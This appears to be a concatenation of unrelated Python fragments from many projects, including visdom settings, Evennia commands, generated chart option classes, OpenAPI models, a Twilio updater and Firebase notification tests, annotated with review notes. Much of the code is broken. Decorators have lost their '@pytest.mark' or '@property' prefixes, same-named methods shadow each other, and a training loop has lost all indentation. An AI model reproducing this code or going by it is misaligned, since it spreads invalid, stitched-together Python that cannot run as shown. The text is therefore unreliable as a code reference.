        if (('main' not in state) and ('main.json' not in env_jsons)):
            state['main'] = {'jsons': {}, 'reload': {}}
            serialize_env(state, ['main'], env_path=self.env_path)
        return state
    def load_user_settings(self):
        """Collect per-user settings: platform config dir plus concatenated CSS
        from the user config dir and the project env dir."""
        settings = {}
        # Resolve the platform-appropriate configuration directory.
        if (platform.system() == 'Windows'):
            base_dir = os.getenv('APPDATA')
        elif (platform.system() == 'Darwin'):
            base_dir = os.path.expanduser('~/Library/Preferences')
        else:
            base_dir = os.getenv('XDG_CONFIG_HOME', os.path.expanduser('~/.config'))
        config_dir = os.path.join(base_dir, 'visdom')
        user_css = ''
        home_style_path = os.path.join(config_dir, 'style.css')
        if os.path.exists(home_style_path):
            with open(home_style_path, 'r') as f:
                user_css += ('\n' + f.read())
        # NOTE(review): this assumes env_path is not None here, unlike the
        # load_* methods above which guard for it — confirm.
        project_style_path = os.path.join(self.env_path, 'style.css')
        if os.path.exists(project_style_path):
            with open(project_style_path, 'r') as f:
                user_css += ('\n' + f.read())
        settings['config_dir'] = config_dir
        settings['user_css'] = user_css
        return settings
class CmdLook(default_cmds.CmdLook, _BaseTwitchCombatCommand):
    """Look command that, when called with no argument, appends a combat
    status summary below the normal look output."""
    def func(self):
        # Run the normal look first so the room/target description is shown.
        super().func()
        if (not self.args):
            combathandler = self.get_or_create_combathandler()
            txt = str(combathandler.get_combat_summary(self.caller))
            # The widest line of the summary drives the header ruler width.
            maxwidth = max((display_len(line) for line in txt.strip().split('\n')))
            self.msg(f'''|r{pad(' Combat Status ', width=maxwidth, fillchar='-')}|n
{txt}''')
class OptionPlotoptionsPictorialSonificationTracksMappingNoteduration(Options):
    """Generated accessors for the noteDuration mapping options.

    NOTE(review): every name is defined twice (getter-style, then
    setter-style); in plain Python the second def shadows the first, so this
    looks like generated code whose @property / @name.setter decorators were
    stripped during extraction — confirm against the generator output.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
def test_full_extra_data(w3):
    """A full 32-byte extraData field must be decoded to raw bytes intact."""
    extra_hex = 'ff' * 32
    fixture = construct_fixture_middleware({'eth_getBlockByNumber': {'extraData': '0x' + extra_hex}})
    w3.middleware_onion.inject(fixture, layer=0)
    latest = w3.eth.get_block('latest')
    assert latest.extraData == b'\xff' * 32
class OptionSeriesFunnelSonificationDefaultinstrumentoptionsMappingPan(Options):
    """Generated accessors for the funnel-series sonification pan mapping.

    NOTE(review): duplicate def names (getter then setter) suggest stripped
    @property / @name.setter decorators — as written, only the setter variant
    of each name survives. Confirm against the generator output.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class ContractApiDialogues(Model, BaseContractApiDialogues):
    """Skill model tracking contract-API dialogues; this skill always plays AGENT."""

    def __init__(self, **kwargs: Any) -> None:
        Model.__init__(self, **kwargs)

        def agent_role(message: Message, receiver_address: Address) -> BaseDialogue.Role:
            # Regardless of the first message, this skill is always the agent.
            return ContractApiDialogue.Role.AGENT

        BaseContractApiDialogues.__init__(self, self_address=str(self.skill_id), role_from_first_message=agent_role, dialogue_class=ContractApiDialogue)
class JaggedLengthsToPresencesTestCase(unittest.TestCase):
    """Compare the AIT jagged_lengths_to_presences op against a PyTorch reference."""
    def _test_jagged_lengths_to_presences(self, batch_size: int, max_seq_len: int=128, lengths_dtype: str='int32', presences_dtype: str='float16', test_suffix: str=''):
        # Dynamic batch dimension so the compiled model accepts 1..batch_size.
        LENGTHS = Tensor(shape=[IntVar([1, batch_size], name='batch_size')], name='lengths', dtype=lengths_dtype, is_input=True)
        PRESENCES = ops.jagged_lengths_to_presences()(lengths=LENGTHS, max_seq_len=max_seq_len, dtype=presences_dtype)
        PRESENCES._attrs['name'] = 'presences'
        PRESENCES._attrs['is_output'] = True
        model = compile_model([PRESENCES], detect_target(), './tmp', f'test_jagged_lengths_to_presences_{test_suffix}')
        torch_lengths_dtype = string_to_torch_dtype(lengths_dtype)
        torch_presences_dtype = string_to_torch_dtype(presences_dtype)
        # Several seeds to cover a range of random length patterns.
        for seed in range(10):
            torch.manual_seed(seed)
            lengths_pt = torch.randint(low=0, high=max_seq_len, size=(batch_size,), dtype=torch_lengths_dtype).cuda()
            presences_pt = _compute_presences_pt(lengths_pt=lengths_pt, max_seq_len=max_seq_len, output_dtype=torch_presences_dtype).cuda()
            presences = torch.empty(size=(batch_size, max_seq_len), dtype=torch_presences_dtype).cuda()
            model.run_with_tensors(inputs={'lengths': lengths_pt}, outputs=[presences])
            torch.testing.assert_close(presences, presences_pt)
    # NOTE(review): the bare '([param(...)])' line below appears to be a
    # decorator missing its '@parameterized.expand' prefix (extraction
    # artifact) — confirm against the original file.
    ([param(1, 1, 1, 'int32', 'bool'), param(2, 11, 23, 'int64', 'float32'), param(3, 1024, 256, 'int32', 'float16'), param(4, 1234, 567, 'int64', 'bool')])
    def test_jagged_lengths_to_presences(self, i, batch_size, max_seq_len, lengths_dtype, presences_dtype):
        self._test_jagged_lengths_to_presences(batch_size=batch_size, max_seq_len=max_seq_len, lengths_dtype=lengths_dtype, presences_dtype=presences_dtype, test_suffix=str(i))
# NOTE(review): the '.parametrize(...)' line below looks like a decorator that
# lost its '@pytest.mark' prefix during extraction — confirm.
.parametrize('start_with', ('angles', 'vectors'))
def test_identity(arrays, start_with):
    """Converting angles->vector->angles (or vector->angles->vector) must be the identity."""
    if (start_with == 'angles'):
        (intensity, inclination, declination) = arrays[0]
        vector = magnetic_angles_to_vec(intensity, inclination, declination)
        npt.assert_almost_equal(magnetic_vec_to_angles(*vector), (intensity, inclination, declination))
    else:
        (magnetic_e, magnetic_n, magnetic_u) = arrays[1]
        angles = magnetic_vec_to_angles(magnetic_e, magnetic_n, magnetic_u)
        npt.assert_almost_equal(magnetic_angles_to_vec(*angles), (magnetic_e, magnetic_n, magnetic_u))
class OptionPlotoptionsPolygonSonificationTracksMappingFrequency(Options):
    """Generated accessors for the polygon-series sonification frequency mapping.

    NOTE(review): duplicate def names (getter then setter) suggest stripped
    @property / @name.setter decorators — as written, only the setter variant
    of each name survives. Confirm against the generator output.
    """
    def mapFunction(self):
        return self._config_get(None)
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)
    def mapTo(self):
        return self._config_get(None)
    def mapTo(self, text: str):
        self._config(text, js_type=False)
    def max(self):
        return self._config_get(None)
    def max(self, num: float):
        self._config(num, js_type=False)
    def min(self):
        return self._config_get(None)
    def min(self, num: float):
        self._config(num, js_type=False)
    def within(self):
        return self._config_get(None)
    def within(self, value: Any):
        self._config(value, js_type=False)
class SchemasSnippetResponseCommon(ModelComposed):
    """OpenAPI-generator composed model (allOf: SnippetResponseCommonAllOf + Timestamps).

    NOTE(review): the bare '_property' and '_js_args_to_python_args' lines
    below look like decorators whose '@cached_' / '@convert_' prefixes were
    lost in extraction — confirm against the generated original.
    """
    # No enum-restricted or validated properties in this schema.
    allowed_values = {}
    validations = {}
    _property
    def additional_properties_type():
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type)
    _nullable = False
    _property
    def openapi_types():
        # Maps attribute name -> accepted types (nullable fields include none_type).
        lazy_import()
        return {'created_at': (datetime, none_type), 'deleted_at': (datetime, none_type), 'updated_at': (datetime, none_type), 'service_id': (str,), 'version': (str,), 'id': (str,)}
    _property
    def discriminator():
        return None
    attribute_map = {'created_at': 'created_at', 'deleted_at': 'deleted_at', 'updated_at': 'updated_at', 'service_id': 'service_id', 'version': 'version', 'id': 'id'}
    read_only_vars = {'created_at', 'deleted_at', 'updated_at', 'service_id', 'version', 'id'}
    _js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """Instantiate from server data; unlike __init__, allows read-only attributes."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        # Resolve which composed (allOf) schema instance owns each attribute.
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            # Optionally drop unknown keys instead of raising.
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
        return self
    required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
    _js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """Instantiate from user code; read-only attributes are rejected."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
            if (var_name in self.read_only_vars):
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
    _property
    def _composed_schemas():
        # allOf composition of the common-fields schema and the timestamps mixin.
        lazy_import()
        return {'anyOf': [], 'allOf': [SnippetResponseCommonAllOf, Timestamps], 'oneOf': []}
def get_base_config():
    """Return the shared default experiment configuration as a ConfigDict."""
    defaults = {
        'seed': 42,
        'env_name': 'antmaze-medium-play-v0',
        'eval_episodes': 10,
        'eval_interval': 5000,
        'batch_size': 256,
        'num_steps': int(1000000.0),
        'log_to_wandb': False,
    }
    config = ml_collections.ConfigDict()
    for key, value in defaults.items():
        setattr(config, key, value)
    return config
class SetGender(Command):
    """Command to set the caller's grammatical gender (stored on caller.db.gender)."""

    key = 'gender'
    aliases = 'sex'
    locks = 'call:all()'

    def func(self):
        """Validate the argument against the allowed genders and store it."""
        caller = self.caller
        choice = self.args.strip().lower()
        if choice not in ('male', 'female', 'neutral', 'ambiguous'):
            caller.msg('Usage: male||female||neutral||ambiguous')
            return
        caller.db.gender = choice
        caller.msg('Your gender was set to %s.' % choice)
# NOTE(review): the '_models(...)' line below looks like a registry decorator
# that lost its '@registry.llm' prefix during extraction — confirm.
_models('spacy.Curie.v2')
def openai_curie_v2(config: Dict[(Any, Any)]=SimpleFrozenDict(max_tokens=500, temperature=_DEFAULT_TEMPERATURE), name: Literal['curie']='curie', strict: bool=OpenAI.DEFAULT_STRICT, max_tries: int=OpenAI.DEFAULT_MAX_TRIES, interval: float=OpenAI.DEFAULT_INTERVAL, max_request_time: float=OpenAI.DEFAULT_MAX_REQUEST_TIME, endpoint: Optional[str]=None) -> Callable[([Iterable[str]], Iterable[str])]:
    """Return a configured OpenAI 'curie' model callable (non-chat completions endpoint by default)."""
    return OpenAI(name=name, endpoint=(endpoint or Endpoints.NON_CHAT.value), config=config, strict=strict, max_tries=max_tries, interval=interval, max_request_time=max_request_time)
def zip_folder(source_folder, dest_folder, zip_name):
    """Create dest_folder/zip_name containing everything under source_folder.

    Prints an error and returns early if either folder is missing. Archive
    entries are stored relative to source_folder. If the computed zip path's
    directory differs textually from dest_folder (e.g. zip_name contains a
    subdirectory), the archive is moved to dest_folder afterwards.
    """
    import zipfile
    import os
    for required in (source_folder, dest_folder):
        if not os.path.exists(required):
            print(f'{required} does not exist')
            return
    zip_file = os.path.join(dest_folder, zip_name)
    with zipfile.ZipFile(zip_file, 'w', zipfile.ZIP_DEFLATED) as archive:
        for current_dir, _subdirs, file_names in os.walk(source_folder):
            for file_name in file_names:
                full_path = os.path.join(current_dir, file_name)
                archive.write(full_path, arcname=os.path.relpath(full_path, source_folder))
    if os.path.dirname(zip_file) != dest_folder:
        final_path = os.path.join(dest_folder, os.path.basename(zip_file))
        os.rename(zip_file, final_path)
        zip_file = final_path
    print(f'Zip file created at {zip_file}')
class Action():
    """Base class for recorded macro actions; kwargs capture the action's parameters.

    NOTE(review): `action` reads like it was a @property (it is used as
    `self.action` in execute/__repr__, where a string is expected, but here it
    is a plain method) — the decorator was probably stripped in extraction.
    Confirm before relying on this file as-is.
    """
    # Optional per-subclass default styling; None means unstyled.
    default_style: object = None
    def __init__(self, **kwargs):
        self.kwargs = kwargs
    def __repr__(self):
        # Render as a reconstructable macro call with sorted kwargs.
        x = [('macro.%s(' % (self.action,))]
        for (k, v) in sorted(self.kwargs.items()):
            x.append(('\n    %s=%r,' % (k, v)))
        x.append('\n)')
        return ''.join(x)
    def to_yaml(self):
        """Serialize as a single-key mapping {action_name: kwargs}."""
        return {self.action: self.kwargs}
    def action(self):
        return self.__class__.__name__
    def execute(self):
        """Instantiate the matching macro with converted kwargs and run it."""
        return getattr(macro, self.action)(**convert(self.action, self.kwargs)).execute()
    def update(self, action, values):
        """Apply keyed updates when this instance is of type *action*.

        Key prefixes: '+' set/overwrite, '-' remove, '=' set only if absent.
        Returns self, or None when the action type does not match.
        """
        if (not isinstance(self, action)):
            return None
        for (k, v) in values.items():
            if (k[0] in ('+',)):
                self.kwargs[k[1:]] = v
            if (k[0] in ('-',)):
                self.kwargs.pop(k[1:], None)
            if ((k[0] in ('=',)) and (k[1:] not in self.kwargs)):
                self.kwargs[k[1:]] = v
        return self
class CaseSelectionWidget(QWidget):
    """Widget for choosing which cases (up to five) should be plotted.

    Shows one (combo box + delete button) row per selected case plus an
    "Add case to plot" button, and emits `caseSelectionChanged` whenever
    the set of selected cases changes.
    """
    # Emitted whenever a selector row is added, removed or its combo changes.
    caseSelectionChanged = Signal()
    def __init__(self, case_names):
        QWidget.__init__(self)
        self._cases = case_names
        # One shared model so every selector combo lists the same case names.
        self.__model = PlotCaseModel(case_names)
        # Maps each row's delete button back to its row widget (see removeWidget).
        self.__signal_mapper = QSignalMapper(self)
        # row widget -> its QComboBox; insertion order tracked separately.
        self.__case_selectors = {}
        self.__case_selectors_order = []
        layout = QVBoxLayout()
        add_button_layout = QHBoxLayout()
        self.__add_case_button = QToolButton()
        self.__add_case_button.setObjectName('add_case_button')
        self.__add_case_button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
        self.__add_case_button.setText('Add case to plot')
        self.__add_case_button.setIcon(QIcon('img:add_circle_outlined.svg'))
        self.__add_case_button.setEnabled((len(self._cases) > 0))
        self.__add_case_button.clicked.connect(self.addCaseSelector)
        add_button_layout.addStretch()
        add_button_layout.addWidget(self.__add_case_button)
        add_button_layout.addStretch()
        layout.addLayout(add_button_layout)
        self.__case_layout = QVBoxLayout()
        self.__case_layout.setContentsMargins(0, 0, 0, 0)
        layout.addLayout(self.__case_layout)
        # Always start with one selector row whose delete button is disabled.
        self.addCaseSelector(disabled=True)
        layout.addStretch()
        self.setLayout(layout)
        self.__signal_mapper.mapped[QWidget].connect(self.removeWidget)
    def __caseName(self, widget) -> str:
        # Current text of the combo belonging to the given row widget.
        return str(self.__case_selectors[widget].currentText())
    def getPlotCaseNames(self):
        """Return the list of currently selected case names (may be empty)."""
        if (self.__model.rowCount() == 0):
            return []
        return [self.__caseName(widget) for widget in self.__case_selectors_order]
    def checkCaseCount(self):
        """Enable/disable the add and per-row delete buttons by row count."""
        # Hard limit of five simultaneous case selectors.
        self.__add_case_button.setEnabled(((len(self._cases) > 0) and (len(self.__case_selectors_order) < 5)))
        for w in self.__case_selectors_order:
            b = w.findChild(QToolButton, 'case_delete_button')
            if b:
                # The last remaining row must not be deletable.
                b.setEnabled((len(self.__case_selectors_order) > 1))
    def addCaseSelector(self, disabled=False):
        """Append a new (combo box + delete button) selector row."""
        widget = QWidget()
        layout = QHBoxLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        widget.setLayout(layout)
        combo = QComboBox()
        combo.setObjectName('case_selector')
        combo.setSizeAdjustPolicy(QComboBox.AdjustToMinimumContentsLengthWithIcon)
        combo.setMinimumContentsLength(20)
        combo.setModel(self.__model)
        combo.currentIndexChanged.connect(self.caseSelectionChanged.emit)
        layout.addWidget(combo, 1)
        button = QToolButton()
        button.setObjectName('case_delete_button')
        button.setAutoRaise(True)
        button.setDisabled(disabled)
        button.setIcon(QIcon('img:delete_to_trash.svg'))
        # Route the click through the signal mapper so removeWidget()
        # receives the row widget rather than the button itself.
        button.clicked.connect(self.__signal_mapper.map)
        layout.addWidget(button)
        self.__case_selectors[widget] = combo
        self.__case_selectors_order.append(widget)
        self.__signal_mapper.setMapping(button, widget)
        self.__case_layout.addWidget(widget)
        self.checkCaseCount()
        self.caseSelectionChanged.emit()
    def removeWidget(self, widget):
        """Remove a selector row and re-evaluate button enablement."""
        self.__case_layout.removeWidget(widget)
        del self.__case_selectors[widget]
        self.__case_selectors_order.remove(widget)
        widget.setParent(None)
        self.caseSelectionChanged.emit()
        self.checkCaseCount()
def g2p(text):
    """Convert English text to phoneme/tone sequences.

    Returns (phones, tones, word2ph) where phones/tones are padded with a
    '_' / 0 sentinel at both ends and word2ph records how many phones each
    token produced (with 1 for each sentinel).
    """
    phones = []
    tones = []
    word2ph = []
    tokens = [t for t in re.split('([,;.\\-\\?\\!\\s+])', text) if t.strip() != '']
    for token in tokens:
        lookup = token.upper()
        if lookup in eng_dict:
            # Known word: take phones/tones straight from the dictionary.
            (syllable_phones, syllable_tones) = refine_syllables(eng_dict[lookup])
            phones.extend(syllable_phones)
            tones.extend(syllable_tones)
            word2ph.append(len(syllable_phones))
            continue
        # Unknown word: fall back to the general grapheme-to-phoneme model.
        phoneme_seq = [p for p in _g2p(token) if p != ' ']
        for phoneme in phoneme_seq:
            if phoneme in arpa:
                (refined, tone) = refine_ph(phoneme)
                phones.append(refined)
                tones.append(tone)
            else:
                phones.append(phoneme)
                tones.append(0)
        word2ph.append(len(phoneme_seq))
    phones = ['_'] + [post_replace_ph(p) for p in phones] + ['_']
    tones = [0] + tones + [0]
    word2ph = [1] + word2ph + [1]
    return (phones, tones, word2ph)
class Column(Options):
    """Configuration options for a single DataTables column.

    NOTE(review): every option below appears as a getter/setter pair sharing
    one name — upstream these are almost certainly decorated with @property
    and @<name>.setter (the decorators look stripped in this copy); confirm
    against the original source before relying on attribute-style access.
    """
    # --- cell content / rendering ---------------------------------------
    def cellType(self):
        return self._config_get()
    def cellType(self, val):
        self._config(val)
    def className(self):
        return EnumStyleOptions(self, 'className')
    def contentPadding(self):
        return self._config_get()
    def contentPadding(self, val):
        self._config(val)
    def defaultContent(self):
        return self._config_get()
    def defaultContent(self, val):
        self._config(val)
    def name(self):
        return self._config_get()
    def name(self, val):
        self._config(val)
    def title(self):
        return self._config_get()
    def title(self, val):
        self._config(val)
    def style(self):
        return self._config_get()
    def style(self, val):
        self._config(val)
    # --- ordering -------------------------------------------------------
    def orderable(self):
        return self._config_get()
    def orderable(self, val):
        self._config(val)
    def orderData(self):
        return self._config_get()
    def orderData(self, val):
        self._config(val)
    def orderDataType(self):
        return self._config_get()
    def orderDataType(self, val):
        self._config(val)
    def orderSequence(self):
        return self._config_get()
    def orderSequence(self, val):
        self._config(val)
    # --- data binding / visibility --------------------------------------
    def render(self):
        return self._config_get()
    def render(self, val):
        self._config(val)
    def data(self):
        return self._config_get()
    def data(self, val):
        self._config(val)
    def searchable(self):
        return self._config_get()
    def searchable(self, val):
        self._config(val)
    def visible(self):
        return self._config_get()
    def visible(self, val):
        self._config(val)
    def width(self):
        return self._config_get()
    def width(self, val):
        self._config(val)
def extractMyoniyoniTranslations(item):
    """Map a feed item to a release message for a known Myoniyoni series.

    Returns None for previews/untagged chapter info, a release message when a
    known series tag matches, and False otherwise.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol or frag)) or ('preview' in item['title'].lower()):
        return None
    # Every known series maps onto itself with tl_type 'translated'.
    known_series = ['Prince of the Octagon', 'Beautiful Top Star', 'Swordmaster Healer', 'Valhalla Saga', 'Top Management', 'The King of the Battlefield', 'Sovereign of Judgement', 'Taming Master', "God's Song", 'Life Mission', 'Demon King & Hero', 'Sovereign of Judgment', 'God of Tennis', 'Kill the Hero', 'Grand Slam', 'The Overlord of Blood and Iron', 'Spirit Sword', 'The Legendary Engie', 'Suspicious Manager Moon', 'Absolute on the Mound', "I Became the Hero's Bride"]
    for series in known_series:
        if series in item['tags']:
            return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix, tl_type='translated')
    return False
def train(args, model, device, train_loader, optimizer, epoch):
model.train()
train_loss = 0
for (batch_idx, (data, target)) in enumerate(train_loader):
(data, target) = (data.to(device), target.to(device))
optimizer.zero_grad()
output = model(data)
loss = F.nll_loss(output, target)
loss.backward()
optimizer.step()
if ((batch_idx % args.log_interval) == 0):
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, (batch_idx * len(data)), len(train_loader.dataset), ((100.0 * batch_idx) / len(train_loader)), loss.item()))
if args.dry_run:
break
train_loss += (loss.item() * len(data))
return (train_loss / len(train_loader.dataset)) |
def show_poly(canvas, path=None, xoff=0, yoff=0):
    """Draw `path` as a polyline on `canvas` and label each vertex with its
    1-based index, slightly jittered so overlapping labels stay readable.

    Args:
        canvas: parent drawing surface (project-specific canvas object).
        path: sequence of (x, y) vertices; defaults to a small triangle.
        xoff, yoff: translation applied to the whole polygon.
    """
    # The original used a mutable default list — a classic Python pitfall
    # (one list shared across all calls) — so the default is built per call.
    if path is None:
        path = [(0, 0), (20, 0), (10, 20), (0, 0)]
    tuplepath = translate_poly(path, xoff, yoff)
    p = Points(tuplepath)
    Polyline(parent=canvas, points=p, line_width=0.5, stroke_color='black')
    for idx, vertex in enumerate(path, start=1):
        text = Text(parent=canvas, text=idx, font='4', fill_color='blue')
        # Jitter of up to 0.5 units left/up keeps labels from stacking.
        text.translate(((vertex[0] + xoff) + random.uniform((- 0.5), 0)), ((vertex[1] + yoff) + random.uniform((- 0.5), 0)))
        text.scale(0.25, 0.25)
def test_shell_script():
    """A ShellTask built from a script file keeps the path and runs with
    typed file/directory/datetime inputs."""
    task = ShellTask(
        name='test2',
        debug=True,
        script_file=script_sh,
        inputs=kwtypes(f=CSVFile, y=FlyteDirectory, j=datetime.datetime),
        output_locs=[
            OutputLocation(var='x', var_type=FlyteDirectory, location='{inputs.y}'),
            OutputLocation(var='z', var_type=FlyteFile, location='{inputs.f}.pyc'),
        ],
    )
    assert task.script_file == script_sh
    task(f=test_csv, y=testdata, j=datetime.datetime(2021, 11, 10, 12, 15, 0))
('twilio_user_update', [SaaSRequestType.UPDATE])
def twilio_user_update(client: AuthenticatedClient, param_values_per_row: List[Dict[(str, Any)]], policy: Policy, privacy_request: PrivacyRequest, secrets: Dict[(str, Any)]) -> int:
    """POST masked field values for each Twilio user row.

    Returns the number of rows updated.
    """
    rows_updated = 0
    for row in param_values_per_row:
        user_id = row.get('sid')
        fields = row['masked_object_fields']
        # Twilio's form API expects PascalCase keys; rewrite them in place
        # (the row dict is deliberately mutated, as in the original).
        for original_key in list(fields.keys()):
            fields[to_pascal_case(original_key)] = fields.pop(original_key)
        client.send(SaaSRequestParams(method=HTTPMethod.POST, path=f'/v1/Users/{user_id}', headers={'Content-Type': 'application/x-www-form-urlencoded'}, body=multidimensional_urlencode(fields)))
        rows_updated += 1
    return rows_updated
def get_package_info(path: str) -> PackageInfo:
    """Inspect a local Python package and compare it against the remote index.

    Runs ``setup.py --version`` / ``--name`` from inside *path* and queries
    the remote metadata for the latest release.

    Args:
        path: directory containing a ``setup.py``.

    Returns:
        PackageInfo with the package name, local version and latest remote
        version.
    """
    # Capture the original cwd *before* the try block: if it were assigned
    # inside and getcwd() raised, the finally clause would hit a NameError
    # that masks the real exception.
    prev = os.getcwd()
    path = os.path.abspath(path)
    try:
        os.chdir(path)
        (out, _err) = run_python_script(cmd=[f'{path}/setup.py', '--version'], allow_warnings=True)
        local_version: Version = parse_version(out)
        (package_name, _err) = run_python_script(cmd=[f'{path}/setup.py', '--name'], allow_warnings=True)
    finally:
        os.chdir(prev)
    remote_metadata = get_metadata(package_name)
    latest = get_releases(remote_metadata)[-1]
    return PackageInfo(name=package_name, local_version=local_version, latest_version=latest)
class TestAndroidNotificationEncoder():
    """Validation tests for encoding messaging.AndroidNotification.

    NOTE(review): the bare `.parametrize(...)` lines below look like
    `@pytest.mark.parametrize(...)` decorators whose `@pytest.mark` prefix
    was stripped during extraction — as written they are not valid Python;
    confirm against the original source.
    """
    def _check_notification(self, notification):
        # Helper: encoding a message with an invalid notification must raise.
        with pytest.raises(ValueError) as excinfo:
            check_encoding(messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=notification)))
        return excinfo
    .parametrize('data', NON_OBJECT_ARGS)
    def test_invalid_android_notification(self, data):
        with pytest.raises(ValueError) as excinfo:
            check_encoding(messaging.Message(topic='topic', android=messaging.AndroidConfig(notification=data)))
        expected = 'AndroidConfig.notification must be an instance of AndroidNotification class.'
        assert (str(excinfo.value) == expected)
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_title(self, data):
        notification = messaging.AndroidNotification(title=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.title must be a string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_body(self, data):
        notification = messaging.AndroidNotification(body=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.body must be a string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_icon(self, data):
        notification = messaging.AndroidNotification(icon=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.icon must be a string.')
    .parametrize('data', (NON_STRING_ARGS + ['foo', '#xxyyzz', '112233', '#11223']))
    def test_invalid_color(self, data):
        # Color must be a '#RRGGBB' string; non-strings get a different error.
        notification = messaging.AndroidNotification(color=data)
        excinfo = self._check_notification(notification)
        if isinstance(data, str):
            assert (str(excinfo.value) == 'AndroidNotification.color must be in the form #RRGGBB.')
        else:
            assert (str(excinfo.value) == 'AndroidNotification.color must be a non-empty string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_sound(self, data):
        notification = messaging.AndroidNotification(sound=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.sound must be a string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_tag(self, data):
        notification = messaging.AndroidNotification(tag=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.tag must be a string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_click_action(self, data):
        notification = messaging.AndroidNotification(click_action=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.click_action must be a string.')
    .parametrize('data', NON_STRING_ARGS)
    def test_invalid_title_loc_key(self, data):
        notification = messaging.AndroidNotification(title_loc_key=data)
        excinfo = self._check_notification(notification)
        assert (str(excinfo.value) == 'AndroidNotification.title_loc_key must be a string.')
    .parametrize('data', NON_LIST_ARGS)
    def test_invalid_title_loc_args(self, data):
        # loc_args must be a list of strings; a list with non-strings and a
        # non-list argument produce distinct error messages.
        notification = messaging.AndroidNotification(title_loc_key='foo', title_loc_args=data)
        excinfo = self._check_notification(notification)
        if isinstance(data, list):
            expected = 'AndroidNotification.title_loc_args must not contain non-string values.'
            assert (str(excinfo.value) == expected)
        else:
            expected = 'AndroidNotification.title_loc_args must be a list of strings.'
            assert (str(excinfo.value) == expected)
    def test_no_title_loc_key(self):
        notification = messaging.AndroidNotification(title_loc_args=['foo'])
